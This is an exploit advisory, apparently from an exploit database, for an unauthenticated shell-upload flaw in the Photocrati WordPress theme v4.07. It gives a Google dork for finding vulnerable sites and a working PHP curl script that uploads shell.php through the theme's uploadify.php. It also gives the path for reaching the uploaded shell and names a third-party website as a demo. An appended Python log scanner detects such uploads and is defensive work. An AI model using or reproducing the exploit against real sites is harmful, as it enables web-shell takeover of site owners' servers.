# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability
# Author : Aloulou
# Date : 13/05/2014
# Facebook : http://www.facebook.com/Aloulou.TN
# Email: aloulou@alquds.com
# Vendor : www.photocrati.com
# Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/
# Tested on : Linux
############################################################################

Exploit:

<?php
$uploadfile = "shell.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile", 'folder' => '/admin/scripts/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

ShellAccess: http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php

Demo: http://www.tanguygilson.com

# Greeting to : Tunisia , CyberPink , Brikovich , Anonboy
############################################################################
# 2935E278AA2F72DF 1337day.com [2014-05-15] 0E88B39FD8DD85B4 #
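A defender-side check for the requests this advisory describes, added here as an example that is not part of the original advisory: it scans web-server access log lines (combined log format assumed) for POSTs to the theme's uploadify.php and for later successful requests to PHP files in the same admin/scripts/ directory. The function name, the sample log lines and the choice to match any theme version are assumptions made for this example.

```python
import re

# Combined Log Format fields used here: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Directory of the upload handler named in the advisory.
# Assumption: other theme versions keep the same layout, so any version matches.
SCRIPTS_DIR = re.compile(
    r'^/wp-content/themes/photocrati-theme-[^/]+/admin/scripts/(?P<file>[^/?]+)'
)
SCRIPT_EXT = (".php", ".phtml", ".php5")

def find_upload_abuse(lines):
    """Return (kind, ip, path) findings in log order (hypothetical helper)."""
    findings = []
    upload_seen = False  # becomes True after a successful POST to uploadify.php
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        d = SCRIPTS_DIR.match(m["path"])
        if not d:
            continue  # request is outside the theme's admin/scripts/ directory
        name = d["file"].lower()
        ok = m["status"].startswith("2")
        if name == "uploadify.php":
            if m["method"] == "POST":
                findings.append(("upload_post", m["ip"], m["path"]))
                upload_seen = upload_seen or ok
        elif name.endswith(SCRIPT_EXT) and ok and upload_seen:
            # A script served from the upload directory after an upload POST.
            findings.append(("script_after_upload", m["ip"], m["path"]))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
BASE = "/wp-content/themes/photocrati-theme-v4.07"
SAMPLE_LOG = [
    f'203.0.113.7 - - [15/May/2014:10:01:02 +0000] "GET {BASE}/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.9 - - [15/May/2014:10:02:10 +0000] "POST {BASE}/admin/scripts/uploadify.php HTTP/1.1" 200 1 "-" "-"',
    f'198.51.100.9 - - [15/May/2014:10:02:15 +0000] "GET {BASE}/admin/scripts/shell.php HTTP/1.1" 200 312 "-" "-"',
    f'203.0.113.7 - - [15/May/2014:10:03:00 +0000] "GET {BASE}/admin/scripts/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Any "upload_post" hit on a site where no administrator was uploading media is worth reviewing, and the files present in admin/scripts/ should be compared against a clean copy of the theme.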